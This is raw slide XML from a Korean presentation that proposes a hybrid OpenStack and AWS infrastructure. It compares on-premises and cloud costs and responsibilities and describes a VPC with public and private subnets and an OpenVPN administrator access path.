            <a:ext cx="571500" cy="3840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571500" y="1962371"/>
            <a:ext cx="5333695" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5333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0392" y="2276924"/>
            <a:ext cx="228600" cy="228600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310335" y="2410122"/>
            <a:ext cx="4500677" cy="4389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관리형 인프라를 활용하여 물리 장비 장애로부터 완전히 분리된 환경 구성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OpenVPN,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웹 서비스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로그 수집 서버를 클라우드에 분산 배치하여단일 장애 지점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(SPOF)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제거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인터넷 기반 접속 구조로 네트워크 장애 발생 시에도 빠른 복구 가능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582930" y="3420805"/>
            <a:ext cx="5333695" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5333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 rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="-80" r="-80"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="811530" y="3735358"/>
            <a:ext cx="286207" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1274216" y="3888063"/>
            <a:ext cx="4548226" cy="57515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IAM, Security Group, VPC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등 계층화된 보안 정책 적용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인스턴스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포트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프로토콜 단위의 접근 제어로 불필요한 외부 노출 최소화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을 통해 관리자 접근 경로를 단일 보안 채널로 통합</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="4879239"/>
            <a:ext cx="5333695" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5333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 rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="-60" r="-60"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="843077" y="5193793"/>
            <a:ext cx="200254" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1268273" y="5383987"/>
            <a:ext cx="4539082" cy="56967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서버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웹 서버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로그 수집 노드를 필요 시 즉시 확장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/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축소 가능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트래픽 증가 또는 사용자 증가 시 물리 장비 증설 없이 대응 가능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하이브리드 환경에서도 동일한 보안 정책을 일관되게 유지</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286500" y="1755091"/>
            <a:ext cx="5333695" cy="4478731"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 262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 rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect t="-180" b="-180"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6620256" y="2104949"/>
            <a:ext cx="190195" cy="152705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6560819" y="5164532"/>
            <a:ext cx="4858207" cy="857707"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4738"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/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6" name="Image 4" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect t="-100" b="-100"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6723582" y="5364785"/>
            <a:ext cx="114300" cy="152705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6952182" y="5326380"/>
            <a:ext cx="4405579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결론: 하이브리드 전략의 이점</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6952182" y="5554980"/>
            <a:ext cx="4391863" cy="3054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민감한 데이터는 온프레미스(OpenStack)에서 직접 통제하고, 외부 접점 및 가변적인 리소스는 AWS를 활용하여 보안성과 효율성의 균형을 달성합니다.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Text 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="323698"/>
            <a:ext cx="3801161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도입 배경 및 필요성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Text 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310335" y="2095569"/>
            <a:ext cx="2905963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고가용성 및 안정성 (Availability)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272387" y="3573510"/>
            <a:ext cx="3048610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세밀한 접근 제어 (Access Control)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1268273" y="5069434"/>
            <a:ext cx="2438705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유연한 확장성 (Scalability)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Text 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7019849" y="2038198"/>
            <a:ext cx="2153412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온프레미스 vs AWS 비교</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="68" name="그룹 67"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6524244" y="2494483"/>
            <a:ext cx="4860036" cy="2508199"/>
            <a:chOff x="6524244" y="2676449"/>
            <a:chExt cx="4860036" cy="2905963"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Shape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6524244" y="2676449"/>
              <a:ext cx="1218895" cy="437998"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F172A">
                <a:alpha val="8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Shape 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6524244" y="3095244"/>
              <a:ext cx="1218895" cy="19202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Shape 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7739482" y="2676449"/>
              <a:ext cx="1800454" cy="437998"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F172A">
                <a:alpha val="8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Shape 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7739482" y="3095244"/>
              <a:ext cx="1800454" cy="19202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Shape 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9536278" y="2676449"/>
              <a:ext cx="1848002" cy="437998"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F172A">
                <a:alpha val="8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Shape 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9536278" y="3095244"/>
              <a:ext cx="1848002" cy="19202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Shape 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6524244" y="3114446"/>
              <a:ext cx="1218895" cy="619049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Shape 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6524244" y="3724351"/>
              <a:ext cx="1218895" cy="9144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Shape 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7739482" y="3724351"/>
              <a:ext cx="1800454" cy="9144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Shape 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9536278" y="3724351"/>
              <a:ext cx="1848002" cy="9144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Shape 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6524244" y="3733495"/>
              <a:ext cx="1218895" cy="619049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Shape 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6524244" y="4343400"/>
              <a:ext cx="1218895" cy="9144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Shape 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7739482" y="4343400"/>
              <a:ext cx="1800454" cy="9144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Shape 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9536278" y="4343400"/>
              <a:ext cx="1848002" cy="9144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Shape 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6524244" y="4352544"/>
              <a:ext cx="1218895" cy="619049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Shape 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6524244" y="4962449"/>
              <a:ext cx="1218895" cy="9144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Shape 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7739482" y="4962449"/>
              <a:ext cx="1800454" cy="9144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Shape 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9536278" y="4962449"/>
              <a:ext cx="1848002" cy="9144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Shape 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6524244" y="4972507"/>
              <a:ext cx="1218895" cy="609905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4" name="Text 37"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6959498" y="2790749"/>
              <a:ext cx="348386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 b="1">
                  <a:solidFill>
                    <a:srgbClr val="22D3EE"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>구분</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Text 38"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7855610" y="2790749"/>
              <a:ext cx="1567282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 b="1">
                  <a:solidFill>
                    <a:srgbClr val="22D3EE"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>온프레미스 (OpenStack)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Text 39"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10000793" y="2790749"/>
              <a:ext cx="919886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 b="1">
                  <a:solidFill>
                    <a:srgbClr val="22D3EE"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>AWS 클라우드</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Text 40"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6752844" y="3323844"/>
              <a:ext cx="633679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000" b="1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구축 비용</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="Text 41"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7804404" y="3228746"/>
              <a:ext cx="1672438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초기 투자 비용(CapEx) 높음</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="Text 42"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8057693" y="3438144"/>
              <a:ext cx="1162202" cy="16276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9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서버, 네트워크 장비 등</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="Text 43"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9797796" y="3228746"/>
              <a:ext cx="1329538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운영 비용(OpEx) 기반</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="Text 44"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10016338" y="3438144"/>
              <a:ext cx="896112" cy="16276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9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사용한 만큼 지불</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Text 45"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6752844" y="3943807"/>
              <a:ext cx="758038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000" b="1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관리 편의성</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Text 46"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7923276" y="3847795"/>
              <a:ext cx="1433779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직접 관리 (High Effort)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="Text 47"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8089697" y="4058107"/>
              <a:ext cx="1105510" cy="16276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9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물리적 유지보수 필요</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="Text 48"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9638690" y="3847795"/>
              <a:ext cx="1643177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관리형 서비스 (Low Effort)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="Text 49"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10016338" y="4058107"/>
              <a:ext cx="896112" cy="16276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9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인프라 관리 위임</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="Text 50"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6752844" y="4562856"/>
              <a:ext cx="471830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000" b="1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확장성</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="Text 51"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8120786" y="4466844"/>
              <a:ext cx="1034186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물리적 한계 존재</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="Text 52"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8178394" y="4677156"/>
              <a:ext cx="924458" cy="16276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9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증설 시 시간 소요</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="Text 53"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9819742" y="4466844"/>
              <a:ext cx="1281989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즉각적인 탄력적 확장</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="Text 54"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9961474" y="4677156"/>
              <a:ext cx="1000354" cy="16276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9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Auto Scaling 지원</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Text 55"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6752844" y="5181905"/>
              <a:ext cx="633679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000" b="1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보안 책임</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="Text 56"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7894015" y="5086807"/>
              <a:ext cx="1491386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전체 책임 (Full Control)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="Text 57"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7984541" y="5296205"/>
              <a:ext cx="1314907" cy="16276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9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물리 보안부터 데이터까지</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="Text 58"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10003536" y="5086807"/>
              <a:ext cx="919886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공동 책임 모델</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="Text 59"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9829800" y="5296205"/>
              <a:ext cx="1267358" cy="16276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9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인프라 보안은 AWS 담당</a:t>
              </a:r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01164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71500" y="381305"/>
            <a:ext cx="571500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571500" y="1047902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하이브리드 클라우드 연결 및 관리자 보안 접근 아키텍처</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="533095"/>
            <a:ext cx="3363163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VPC 구성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571499" y="4761541"/>
            <a:ext cx="2755989" cy="1758087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" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571499" y="4761541"/>
            <a:ext cx="47521" cy="1758087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3" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="746759" y="4897941"/>
            <a:ext cx="232561" cy="247802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84" name="Image 5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808914" y="4962787"/>
            <a:ext cx="117501" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Text 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123797" y="4927048"/>
            <a:ext cx="1979065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AWS VPC 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구성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Text 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761695" y="5237944"/>
            <a:ext cx="2418588" cy="78790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- VPC CIDR: 10.200.0.0/16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→ AWS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내부 리소스를 위한 독립적인 사설 네트워크 대역 구성</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l"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-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퍼블릭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/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프라이빗 서브넷 분리를 통해 보안 영역 분리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(Segmentation)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적용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Shape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3568903" y="4761541"/>
            <a:ext cx="2755990" cy="1758087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8" name="Shape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3568902" y="4761541"/>
            <a:ext cx="45719" cy="1758087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F472B6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9" name="Shape 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3754983" y="4913332"/>
            <a:ext cx="229511" cy="232411"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 73385"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F472B6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0" name="Image 6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815327" y="4962755"/>
            <a:ext cx="102725" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Text 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4121200" y="4927047"/>
            <a:ext cx="1748054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서브넷 구성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Text 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3759098" y="5193114"/>
            <a:ext cx="2526434" cy="1222249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- Public Subnet (10.200.0.0/20)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 - OpenVPN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서버 및 외부 접근이 필요한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EC2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배치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 - Internet Gateway(IGW)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와 연결되어 외부 인터넷 통신 허용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- Private Subnet (10.200.128.0/20)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 -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외부에서 직접 접근이 불가능한 내부 리소스 영역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 -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향후 내부 서비스 확장 및 보안 강화를 고려한 구조</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Shape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6580326" y="4762456"/>
            <a:ext cx="2689708" cy="1757172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4" name="Shape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6580325" y="4762456"/>
            <a:ext cx="45719" cy="1757172"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
